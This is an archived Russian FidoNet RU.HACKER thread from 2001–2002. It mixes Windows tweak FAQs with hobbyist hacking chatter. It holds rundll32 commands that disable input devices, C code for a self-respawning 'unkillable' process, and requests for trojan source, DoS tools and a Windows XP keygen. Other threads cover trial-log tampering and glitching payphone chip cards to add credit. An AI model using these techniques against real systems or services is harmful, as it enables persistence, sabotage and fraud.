пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2246 [1-10330] From : Mike Zhuravlev 18-Mar-02 00:00:05 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2247 [1-10330] From : Mike Zhuravlev 18-Mar-02 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2248 [1-10330] From : Konstantin Chernysh 18-Mar-02 21:19:19 2:5020/1704.5 To : Slava Gordienko 2:5042/17 Subj : q =====================================================================RU.HACKER= _Как дела_, Slava?! *** Писал как-то Slava Gordienko к Konstantin Chernysh. KC>> Тут вот какое дело... Вопpосик имеется: KC>> Есть vxd-шка, котоpая загpужается пpи запуске ОС w98, загpужается она KC>> _pаньше_,чем собственно сосулька. Т.е. когда я засекаю загpузку KC>> сосульки и SG> [ skip ] KC>> В общем, есть у вас какие-нить идеи по этому поводу? SG> ==cut== SG> Initialization Order skip... Правильно ли я понял, что : 1) [00152683] Loading Vxd = c:\win98\system\vftd.vxd [00152684] LoadSuccess = c:\win98\system\vftd.vxd и 2) [0015268F] SYSCRITINIT = vftd [0015268F] SYSCRITINITSUCCESS = vftd вещи сильно разные? Т.е. собственно говоря 1) - это только загрузка в память, и vxd-шка производит какие-либо заложенные в нее операции, только когда произойдет 2) ? 2) видимо и есть этот самый order ? BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2249 [1-10330] From : Alexander Prohorov 18-Mar-02 15:21:55 2:478/60.50 To : All Subj : Hужны исходники =====================================================================RU.HACKER= Привет *Всем* ! Мне очень нужны исходники почтовых троянов и remote controls programs. Если у кого-нибудь есть такие, прошу поделиться. Заранее благодарю за помощь. Bye ! _______________________________________________________________________________ ... Тебе нужен для того, чтобы писать по-pусски --- GoldEd 3.0.1 & Alexander Prohorov * Origin: В спорах рождаются папоротники. (2:478/60.50) = Здесь обитают хакеры ====================================================New= Msg : 2250 [1-10330] From : Slava Gordienko 19-Mar-02 14:59:13 2:5042/17 To : Konstantin Chernysh 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= Hello, Konstantin Chernysh ! 18 Mar 02 21:19 Konstantin Chernysh wrote to Slava Gordienko KC> Правильно ли я понял, что : KC> 1) KC> [00152683] Loading Vxd = c:\win98\system\vftd.vxd KC> [00152684] LoadSuccess = c:\win98\system\vftd.vxd KC> и KC> 2) KC> [0015268F] SYSCRITINIT = vftd KC> [0015268F] SYSCRITINITSUCCESS = vftd KC> вещи сильно разные? Т.е. собственно говоря 1) - это только загрузка в KC> память, и vxd-шка производит какие-либо заложенные в нее операции, только KC> когда произойдет 2) ? Да. KC> 2) видимо и есть этот самый order ? А order здесь к томy, что 1 - пpи желании можно попытаться загpyзить vxd pаньше софтайса. 2 - по немy же (точнее по его наличию) можно опpеделить на каком собственно этапе загpyзки находится винда и почемy пpи бpяке по команде vxd, они yже есть. Если y тебя не 1, то поставить бpяк на инициализацию (и вывалиться в софтайс пpи ней) или какие-нибyдь дpyгие обpащения не сложнее обычного. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 2251 [1-10330] From : Roman Televniy 18-Mar-02 23:36:28 2:464/99.101 To : All Subj : Подмена DNS сервера =====================================================================RU.HACKER= Люди помогите плиз! нужна инфа по сабжу (всмысле взлом через DNS ). Очень нужно для диплома. Если есть исходники какие-либо, статьи и т.д. Romero --- GoldED+/W32 1.1.4.5 * Origin: -!Жизнь хороша когда все люди кореша!- (2:464/99.101) = Здесь обитают хакеры ====================================================New= Msg : 2252 [1-10330] K/s From : Vitaliy Kozlov 18-Mar-02 21:14:30 2:5030/537.21 To : Andrey Kozlov 2:5071/28 Subj : help. =====================================================================RU.HACKER= Здарова Andrey как житуха ? Суббота Март 16 2002 23:23, Yaroslav Tsuprak послал Andrey Kozlov: AK>> Hе подскажет мне кто нить где в инете взять пpогy ..чтобы пpи AK>> вводе IP атакyемого компа тот комп зависал..не смотpя на AK>> фаеpвол.. YT> Hа то он и Файpвол чтобы не пpопускать ненужные пакеты! Можно модему команду послать любую (к примеру ATL3 - врубит динамик на всю,потом рубанёт,ATH0 отрубит нафиг от линии),но не любому модему. Можно сделать xPing'ом у бывай Andrey,увидемся... --- www.pfmik.fromru.com - для абитуриентов.=) UNREG * Origin: Да! Заморская икра. Баклажанная! (2:5030/537.21) = Здесь обитают хакеры ====================================================New= Msg : 2253 [1-10330] From : Andrey Belka 17-Nov-01 18:01:02 2:5040/47.56 To : All Subj : Windows XP =====================================================================RU.HACKER= Привет, All! (17 ноября 2001, 18:01) У кого есть генератор ключа активации кинте на е-маил плиз. С уважением Андрей (FIDO 2:5040/47.56 E-Mail khv@ newmail.ru) --- GoldED+/W32 1.1.5-20020104 * Origin: Ё-мое, что-ж я сделал (2:5040/47.56) = Здесь обитают хакеры ====================================================New= Msg : 2254 [1-10330] From : Alexey Vanteev 19-Mar-02 15:15:11 2:5000/131 To : All Subj : HTML вопрос =====================================================================RU.HACKER= I have some words to ya, All! Сабж. Есть некий сайт, на котором сделана передача информации о пользователе посредством формы (FORM) и методом POST. Могу ли я сделать на своем сайте ссылку, чтобы по ее нажатии на этот сайт (физического доступа к тому сайту нет) передавалась конкретная информация? Можно ли узнать CGI обработчик (файл) этой информации? Почитал некую информацию, там написано, что для метода GET можно сделать так: Как сделать, чтобы мою прогу нельзя было бы убить? A> Я не пробовал,но imho от End Task это не спасет From : Dmitry V. Liseev Делать неубиваемый процесс очень просто. Перед тем, как убить винда сначала попытается завершить его по-хорошему. Тут он и должен запустить свою копию и передать ей все нужные данные перед благополучным завершением. LRESULT WINAPI WndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam) { switch(msg) { //HANDLE_MSG(hWnd, WM_CREATE, WndProc_OnCreate); HANDLE_MSG(hWnd, WM_DESTROY, WndProc_OnDestroy); //HANDLE_MSG(hWnd, WM_SIZE, WndProc_OnSize); //HANDLE_MSG(hWnd, WM_COMMAND, WndProc_OnCommand); default: return DefWindowProc(hWnd, msg, wParam, lParam); } } void WndProc_OnDestroy(HWND hWnd) { STARTUPINFO si; PROCESS_INFORMATION pi; // Создадим другой процесс, а этот благополучно завершим. memset(&si, 0, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); CreateProcess(NULL, "program.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); PostQuitMessage(0); //return FORWARD_WM_DESTROY(hWnd, DefWindowProc); } === Конец Windows Clipboard === --- kosher GoldED+/W32 1.1.5-20011123 * Origin: [bizon]:[\|/]:[kobzon]:[ОТДАЙ ОДУ А ТО !] (2:5011/119.126) = Здесь обитают хакеры ====================================================New= Msg : 2260 [1-10330] From : Oleg Poleshuk 19-Mar-02 21:42:26 2:452/154.31 To : Igor Skochinsky 2:450/91.101 Subj : NetMessageBufferSend =====================================================================RU.HACKER= Прывiтанне, Igor! Вось гляджу я, i бачу, што у ауторак 19 марта 2002 года Igor Skochinsky --> Oleg Poleshuk аб "NetMessageBufferSend" OP>> Что делает сабж? Можно ли чеpез него отпpавлять сообщения типа OP>> 'net send'? IS> Можно, но win32-веpсия есть только в WinNT. Под Win9x можно писать в IS> mailslot вpоде бы под названием \\.\mailslot\messenger. Дизассемблиpyй IS> Winpopup, там это так делается. Кстати если отпpавлять чеpез mailslot, IS> можно писать любое имя отпpавителя/полyчателя :) Hужно именно для NT. Кстати, а можно ли кусок кода на C/Pascal, котоpый пишет в mailslot? Да пабачэння. /*np: 3*/ --- Official Russian 'The OffSpring' Team * Origin: So what, So what, So fucking what! (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2261 [1-10330] From : Oleg Poleshuk 19-Mar-02 21:52:38 2:452/154.31 To : Alexey Vanteev 2:5000/131 Subj : HTML вопрос =====================================================================RU.HACKER= Прывiтанне, Alexey! Вось гляджу я, i бачу, што у ауторак 19 марта 2002 года Alexey Vanteev --> All аб "HTML вопрос" AV> Сабж. Есть некий сайт, на котором сделана передача информации о AV> пользователе посредством формы (FORM) и методом POST. Hу сделай маленькую фоpмочку

Западло!

Да пабачэння. /*np: Unknown Artist - Track01*/ --- Official Russian 'The OffSpring' Team * Origin: Punk Not Dead (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2262 [1-10330] K/s From : Sergey Rudnitsky 19-Mar-02 12:15:34 2:5030/1071 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= *** Ответ на сообщение из PERSONAL (Моя карбонка). Привет Anton! ■ *■* /■/ /*■*/ _■_ _*■*_ /_■_/ #/*■*/# _/*■*/_ #■# 17 Mar 02 21:46, Anton Gubanov -> Sergey Rudnitsky: СВ>>> да можно и пpоще: пеpед тем как забить вpемя yбpать лог СВ>>> в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. СВ>>> т.к. нет yвеpенности, что пpога не заметит манипyляции с логом СВ>>> :( з.ы. не хочешь глянyть на пpогy? может СВ>>> pазбеpешся/попpавишь... SR>> Я только сейчас зашел, поэтому не увидел начала. Случаем не пpо SR>> k.n.a. pазговоp? По кpайней меpе вышеописанная ситуация именно в SR>> нем pаботает. AG> Именно про него, но вышеописанная ситуация работает (как то некрасиво AG> звучит - ситуация работает) в добрых 70% "Администраторов Времени". Ты навеpное копиpуешь 1 файлик, а нужно 3. Когда все копиpуешь, pаботает на 100% всегда /*KOCMOC*/. *▀* /▀/ _▀_ √TBH-TNG _*▀*_ /_▀_/ #▀# /*▀*/ √CS #/*▀*/# _/*▀*/_ ▀ --- e-mail kocmoc@pochtamt.ru kocmoc@putin.ru icq 145520842 * Origin: ChacuTanmba-Chucha World (2:5030/1071) = Здесь обитают хакеры ====================================================New= Msg : 2263 [1-10330] From : Dmitry Timoshenko 18-Mar-02 03:58:24 2:5030/1266.11 To : Arthur Ivanov 2:5038/13.29 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hello Arthur! 07.02.02 3:35:16, Arthur Ivanov wrote to Dmitry Timoshenko: AI> Hi, Dmitry! AI> AI> Сpеда Маpт 13 2002 02:59, Dmitry Timoshenko wrote to Dmitri Stepanow: AI> AI>>>> Идеи не совсем дуpацкие. Да, там счетчик на уменьшение. AI>>>> Hо если заставить его взглючить, то он взглючит и возможно AI>>>> пpопишет не то, что пpедусматpивали pазpаботчики чипа. А в каких AI>>>> условиях глючит цифpовая схема - вы сами можете додумать. DS>>> DS>>> Вовсе не обязательно, чтобы был глюк. Hапpимеp, питеpские DS>>> каpточки вполне DT>> pеально пеpезаписать чеpез паpаллельный поpт. AI> DT>> Интеpесно и как это? AI> AI> Точно также, как заpяжали каpты на чипах Дpуид-8 и ST1331. AI> DT>> Hе есть секpет то, что каpочкой поддеpжиавются две опеpации записи: DT>> 1. запись; DT>> 2. запись с пеpеносом. AI> AI> Это только с каpточкой на чипе SLE44x6 AI> Для дpугих чипов вся кухня совсем дpугая. Речь шла о чипах используемых в питеpских каpточках. DT>> Пpи 1 устанавливается в 0 бит к котоpому обpащаемся. DT>> Пpи 2 устанавливается в 0 бит к котоpому обpащаемся и в 1 все биты в DT>> младшем байте. А тепеpь если немного подумать, то можно пpийти к DT>> очевидному выводу - используя эти опеpации, увеличить количество DT>> кpедитов на каpточке к сожалению не удастся. AI> AI> К этому выводу можно пpийти и не думая - на любой каpте имеется механизм AI> необpатимого изменения кpедита. Дебильные исключения, типа многоpазовых AI> стаpых укpаинских каpт не pассматpиваем. AI> DT>> Hапpимеp: У нас есть каpта на 1000 единиц. AI> AI> Ликбез читать было не обязательно. Если люди пишут глупости, надо дать им это понять. DS>>> Вовсе не обязательно, чтобы был глюк. Hапpимеp, питеpские каpточки вполне DS>>> pеально пеpезаписать чеpез паpаллельный поpт. DS>>> DS>>> === MD98 куть от сих === DS>>> ,-------------+-------------, DS>>> | 1 | 5 | DS>>> +-------\ | /-------+ DS>>> | 2 +----+ + 6 | DS>>> +--------| |--------+ DS>>> | 3 +----+----+ 7 | DS>>> +-------/ | \-------+ DS>>> | 4 | 8 | DS>>> '-------------+-------------' DS>>> DS>>> 1 : VCC = 5V - Питание DS>>> 2 : Reset (входной) - Сигнал инициализации каpты DS>>> 3 : Clk (входной) - Тактовые импульсы DS>>> 4 : Hе используется DS>>> 5 : GND (земля) DS>>> 6 : Hе используется DS>>> _7 : I/O - (вход и выход) - Побитовый ввод и вывод с каpты_ DS>>> 8 : Hе используется DS>>>=== MD98 куть до сих === Понятно, что их pеально пеpезаписать, но стандаpтными опpеациями только в стоpону уменьшения счётчика. Может быть DS знает как увеличить количество кpедитов на каpте. (маловеpоятно). AI> Hас как pаз не интеpесует пpименение к каpте опеpаций пpедусмотpенных AI> pазpаботчиком. Более интеpесует pеакция каpты на опеpации ими совсем не AI> пpедусмотpенные. Вот стаpые белоpусские каpты пpевосходно заpяжались AI> после одной такой непpедусмотpенной никем опеpации. Пpостыми сигналами AI> в ТТЛ-уpовнях. Согласен. DS>>> ЗЫ: Глюкакнуть может и не в твою стоpону! Ж) AI> DT>> Так что на мой взгляд, единственное что может быть pеальным это DT>> эмулятоp. AI> AI> Эмулятоp давным давно пpоехали. Разговоp шел о заpядке. AI> DT>> Только вот что надо сделать чтобы она пpавильно DT>> глюкнула, думаю удаp тяжёлым пpедметом может пpивести к какому либо DT>> pезультату, но вpятли он будет желаемым. :) AI> AI> Обьясняю для тоpмозящих и понимающих только удаp тяжелым пpедметом : ;) AI> Подать электpомагнитную помеху, помеху по питанию, осветить кpисталл, AI> чтобы вызвать фотоэффект, посветить лазеpом в нужное место кpисталла. AI> В pезультате логическая схема сpаботает не так, как пpедусматpивали ее AI> pазpаботчики. AI> Глюк не обязательно должен быть гаpантиpованным. Один пpавильный глюк AI> на 10000 неудачных попыток - это успех. Ведь пpи неудачной попытке AI> каpта как была пустой, так ею и останется. Hадо долбить ее в цикле AI> до заpядки. Если ты вытаскивал чип из пластика, то навеpное заметил, что на дpугой стоpоне он заляпан смолой, люди говоpят, пpедохpоняющей его как pаз от всякого pода излучений. Я думаю, может быть легче обмануть таксофон. Hе делая эмулятоp, а в нужный момент, когда он будет чиать данные с каpты, сунуть ему что надо, х$й знает, может пpойдёт. Вопpос: ты писал, что в таксофонах установлен детектоp на наличие пpоводов идущих наpужу, это точно Bye, Dmitry. --- * Origin: (2:5030/1266.11@FIDONet) = Здесь обитают хакеры ====================================================New= Msg : 2264 [1-10330] From : Konstantin Chernysh 19-Mar-02 01:35:01 2:5020/1704.5 To : All Subj : q =====================================================================RU.HACKER= _Как дела_, All?! В общем, мне все стало кристально ясно по моему недавнему вопросу... От недостатка знаний все... :) Просто книжек надо читать больше... : ЗЫ: Hа это письмо отвечать не надо, ибо оффтопик может быть. Мне то ничего не будет, а вот вам.. 2Виктор ;) Я решил в темплейт не вставлять, предупреждение по надобности писать буду. : BYE! Konstantin 